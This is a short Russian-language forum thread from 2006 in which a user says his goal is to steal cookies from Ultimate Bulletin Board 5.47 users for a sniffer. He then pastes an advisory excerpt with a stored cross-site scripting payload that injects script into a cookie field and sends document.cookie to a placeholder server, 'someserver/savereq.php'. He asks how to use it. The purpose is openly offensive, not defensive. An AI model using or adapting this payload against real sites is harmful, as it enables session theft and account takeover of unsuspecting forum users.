Форумы Ultimate Bulletin Board 5.47

Discussion in 'Уязвимости CMS/форумов' started by злюка, 11 Jan 2006.

  1. злюка

    злюка Elder - Старейшина

    Joined:
    11 Nov 2005
    Messages:
    337
    Likes Received:
    132
    Reputations:
    69
    Ultimate Bulletin Board 5.47

    задача поиметь куки на ачатовский снифер....поиск юзал ничего не нашёл....
     
  2. злюка

    злюка Elder - Старейшина

    Joined:
    11 Nov 2005
    Messages:
    337
    Likes Received:
    132
    Reputations:
    69
    Удаленный авторизованный пользователь может внедрить произвольный HTML код в некоторые поля в куки Ultimate Bulletin Board, которые будут отображены в странице краткого обзора или в странице последних сообщений форума. Пример:

    username<script>document.write('<img src%3D"http://someserver/savereq.php?'%2Bdocument.cookie%2B'" width%3D0height%3D0>')</script>


    вот нарыд это но немогу понять как это использовать